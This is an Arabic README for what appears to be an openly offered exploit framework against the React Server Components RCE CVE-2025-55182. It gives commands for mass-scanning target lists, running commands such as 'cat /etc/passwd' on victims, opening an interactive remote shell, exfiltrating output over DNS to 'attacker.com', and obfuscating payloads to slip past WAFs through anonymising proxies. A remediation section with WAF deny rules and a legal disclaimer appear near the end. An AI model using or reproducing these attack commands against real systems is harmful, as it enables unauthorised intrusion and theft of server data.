
CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit — Updated!
ماسح متقدم لثغرة RCE في React Server Components للثغرة CVE-2025-55182. الميزات: بصمة متعددة المراحل، التحقق من الثغرة، تسريب DNS، صدفة تفاعلية، تشويش الحمولة، وتقارير احترافية (JSON/HTML/PDF). للاختبار المصرح به فقط.
📑 جدول المحتويات
⚠️ إخلاء المسؤولية القانونية وإشعار أخلاقي
تم تصميم هذه الأداة حصريًا لأغراض التعليم واختبارات الأمان المصرح بها. يشكل الاستخدام غير المصرح به لهذا البرنامج ضد أهداف دون موافقة كتابية مسبقة انتهاكًا لقوانين الجرائم الحاسوبية الدولية، بما في ذلك قانون الاحتيال وإساءة استخدام الحاسوب (CFAA)، ومتطلبات GDPR، واتفاقيات شروط الخدمة القياسية. يخلي المؤلف والمساهمون مسؤوليتهم عن أي إساءة استخدام أو عمليات غير قانونية أو أضرار تبعية ناتجة عن هذا البرنامج. استخدمه على مسؤوليتك الخاصة حصريًا.
📋 نظرة عامة
ReactRCE-Scanner هو إطار تقييم وتحقق أمني بمستوى المؤسسات، مصمم خصيصًا لـ CVE-2025-55182 [1]، وهي ثغرة حرجة لتنفيذ التعليمات البرمجية عن بُعد (RCE) تؤثر على مكونات خادم React عبر الإصدارات من 19.0.0 إلى 19.2.0.
يسد الإطار الفجوة بين البحث النظري عن الثغرات والتحقق الأمني العملي. من خلال دمج البصمة متعددة المراحل، والتقليل الصارم من الإيجابيات الكاذبة، وتعتيم الحمولات المتقدم، وإعداد التقارير الآلية متعددة الصيغ، فإنه يوفر لمهندسي الأمان قدرات تشخيصية دقيقة.
| الاستخدام | نتائج الفحص |
|---|---|
🎯 القدرات الرئيسية
| فئة الميزة | أبرز ملامح التنفيذ | الحالة التشغيلية |
|---|---|---|
| البصمة الذكية | كشف الإطار والإصدار من مصادر متعددة مع خوارزميات تقييم الثقة. | ✅ |
| التحقق متعدد المراحل | خط تحقق من 5 مراحل مصمم للقضاء المنهجي على الإيجابيات الكاذبة. | ✅ |
| توليد الحمولات | مُنشئ حمولات مُعتَّمة يدعم تسريب DNS والترميز المتعدد. | ✅ |
| الصدفة التفاعلية | تنفيذ أوامر تفاعلي شبه حقيقي والوصول إلى الصدفة على الأهداف المؤكدة. | ✅ |
| تقارير شاملة | توليد تقارير آلية بصيغ JSON وHTML وPDF وMarkdown. | ✅ |
| تسريب DNS | تسريب مخرجات الأوامر خارج النطاق عبر معالجة استعلامات DNS الآمنة. | ✅ |
| محرك التزامن | بنية فحص متعددة الخيوط عالية الأداء لأسطح الهجوم الكبيرة. | ✅ |
| دمج الوكيل | دعم وكلاء HTTP/HTTPS وSOCKS لحركة تقييم مجهولة الهوية. | ✅ |
🚀 دليل البدء السريع
التثبيت
استنسخ المستودع وتهيئة البيئة باستخدام نص الإعداد الآلي أو تثبيت التبعيات يدويًا:
# Clone the repository
git clone https://github.com/CerberusMrXi/CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit.git
cd CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit
# Configure execution permissions and run setup script
chmod +x setup.sh
./setup.sh
# Alternatively, install core Python dependencies manually
pip install -r requirements.txt
مرجع الأوامر الأساسية
يعمل الإطار عبر بنية CLI معيارية تدعم التحقق من هدف واحد، والفحص الجماعي من قوائم الملفات، وإنشاء صدفة تفاعلية، وتقارير الامتثال.
# 1. Perform a vulnerability scan against a single target
python exploit.py -t https://target.com -m scan
# 2. Execute bulk scans from a target list with JSON export
python exploit.py -f targets.txt -m scan -o report.json
# 3. Execute a single command on a verified vulnerable endpoint
python exploit.py -t https://target.com -m exploit -c "whoami"
# 4. Initiate an interactive remote shell session
python exploit.py -t https://target.com -m shell
# 5. Execute commands with out-of-band DNS exfiltration
python exploit.py -t https://target.com -m exploit -c "cat /etc/passwd" -d attacker.com
# 6. Compile a professional executive assessment report in PDF format
python exploit.py -f targets.txt -o assessment_report.pdf --format pdf
🔬 البنية المعمارية وتحليل الميزات المتقدم
1. محرك البصمة الذكية
يقوم الإطار بإجراء استطلاع عميق قبل إرسال الحمولة. يحلل حقول رؤوس HTTP المتعددة (X-Powered-By، Next-Action، RSC)، ووسوم HTML الوصفية الهيكلية (data-reactroot، __NEXT_DATA__)، وأصول البناء الثابتة، وحزم مصدر JavaScript [2] [3].
تُصنَّف درجات الثقة إلى أربع فئات:
-
حرجة (95%+): مؤشرات متعامدة متعددة تؤكد إصدارات وقت تشغيل مكونات خادم React القابلة للاستغلال.
-
عالية (75–95%): مؤشرات هيكلية قوية محددة مع مطابقة إصدار دقيقة.
-
متوسطة (50–75%): علامات إطار جزئية موجودة؛ يلزم التحقق اليدوي.
-
منخفضة (<50%): اكتشاف استدلالات ضعيفة؛ احتمال كبير لإيجابية كاذبة.
2. سير عمل التحقق متعدد المراحل
للحفاظ على السلامة التشغيلية ومنع تعطيل الخدمات غير المقصود، تمر الحمولات عبر خط تحقق صارم قبل فتح أي مرحلة استغلال.
Target URL / Endpoint
│
▼
[Stage 1] Framework & Header Detection
│
▼
[Stage 2] Component Version Analysis
│
▼
[Stage 3] Protocol Compatibility Check
│
▼
[Stage 4] Non-Destructive Safe Validation Request
│
▼
[Stage 5] Statistical Confidence Scoring
│
▼
Vulnerability Assessment Decision
3. تعتيم الحمولات والتهرب
لاختبار الضوابط الدفاعية وجدران حماية تطبيقات الويب (WAFs)، يتضمن الإطار مُنشئ حمولات متقدمًا يدعم:
-
مخططات الترميز: تحويلات Base64 وHexadecimal وOctal.
-
التعتيم الهيكلي: تقسيم السلاسل الديناميكي، وحقن التعليمات البرمجية غير المفيدة، وتعيين طرق
requireالبديلة. -
التسريب خارج النطاق (OOB): نفق بيانات آمن عبر استعلامات DNS عندما تكون قنوات الاستجابة المباشرة مقيدة.
4. صدفة الأوامر التفاعلية
عند إنشاء الجلسة بنجاح، يمكن للمشغلين استدعاء بيئة صدفة تفاعلية لاستطلاع ما بعد التحقق.
$ python exploit.py -t https://target.com -m shell
[*] Initializing interactive shell session against https://target.com
[!] Type 'exit' to terminate the session.
shell> whoami
www-data
shell> uname -a
Linux ip-10-0-1-15 6.8.0-1018-aws #20-Ubuntu SMP PREMO__X64 x86_64 GNU/Linux
shell> exit
[*] Terminating session and cleaning up temporary artifacts...
5. مجموعة التقارير الاحترافية
يمكن توليد التقارير عبر صيغ معيارية متعددة (JSON، HTML، PDF، Markdown) تحتوي على ملخصات تنفيذية، ومقاييس المخاطر، والنتائج التقنية التفصيلية، والجداول الزمنية للأدلة، وتحليلات تقييم CVSS v3.1 [4].
⚙️ مرجع الإعدادات
تُدار المعلمات المتقدمة عبر ملف الإعدادات config.yaml. فيما يلي قالب إعدادات الإنتاج:
# ReactRCE-Scanner Production Configuration
timeout: 30
threads: 20
max_retries: 3
proxy: null
user_agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36"
headers:
Accept: "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8"
Accept-Language: "en-US,en;q=0.5"
Accept-Encoding: "gzip, deflate, br"
output:
format: "json"
directory: "./reports"
logging:
level: "INFO"
file: "exploit.log"
exploit:
obfuscate: true
encoding: "base64"
timeout: 60
scanning:
concurrent_scans: 20
rate_limit: 0.5
timeout: 30
fingerprint:
enable_deep_analysis: true
follow_redirects: true
analyze_assets: true
نفّذ عمليات الفحص بالإشارة إلى ملف الإعدادات المخصص عبر:
python exploit.py -f targets.txt -C config.yaml -o report.json
🧪 مجموعة الاختبارات الآلية
يتضمن المستودع مجموعة شاملة من اختبارات الوحدة والتكامل لضمان استقرار الوحدات عبر الإصدارات.
# Execute the complete automated test suite
python exploit.py --test
# Expected Output:
Running test suite...
✓ test_fingerprinting passed
✓ test_payload_generation passed
✓ test_config_loading passed
✓ test_verification passed
✓ test_report_generation passed
Tests passed: 5/5
للمساهمين الذين يعدّون بيئة تطوير محلية:
git clone https://github.com/CerberusMrXi/CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit.git
cd CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit
pip install -r requirements-dev.txt
# Run pytest unit tests
pytest tests/
# Format and lint codebase
black exploit.py
flake8 exploit.py
🛡️ المعالجة والتخفيف
الإجراءات الإدارية الفورية
-
التصحيح: قم بترقية حزم React فورًا إلى الإصدار
19.2.1أو أعلى. حدّث نسخ Next.js إلى الإصدار15.0.4+[5]. -
المراقبة: افحص سجلات وصول HTTP بحثًا عن قيم رأس
Next-Actionالمشبوهة ومراجع النموذج الأولي غير المُتحقق منها (__proto__،constructor) [6]. -
تقوية الشبكة: قيّد استعلامات DNS العودية الصادرة من خوادم التطبيقات لمنع تسريب البيانات.
قواعد WAF المرجعية (Nginx / OpenResty)
# Block prototype pollution and remote execution attempts in request bodies
if ($request_body ~* "__proto__") {
return 403;
}
if ($request_body ~* "constructor") {
return 403;
}
if ($request_body ~* "child_process") {
return 403;
}
if ($request_body ~* "execSync") {
return 403;
}
📚 المراجع
🤝 المساهمة والمجتمع
نرحب بالمساهمات وطلبات الميزات وتقارير الأخطاء. يرجى الالتزام بسير عمل fork-and-pull request القياسي:
-
Fork the repository (
https://github.com/CerberusMrXi/CVE-2025-55182-Advanced-React-Server-Components-RCE-Exploit/fork) -
Create your feature branch (
git checkout -b feature/AdvancedScannerModule) -
Commit your changes (
git commit -m 'Add advanced scanning heuristic') -
Push to the branch (
git origin push feature/AdvancedScannerModule) -
Open a Pull Request
📜 الترخيص والمؤلف
موزع تحت MIT License. راجع LICENSE لمزيد من المعلومات.
Created with precision by CerberusMrXi Last Updated: August 2026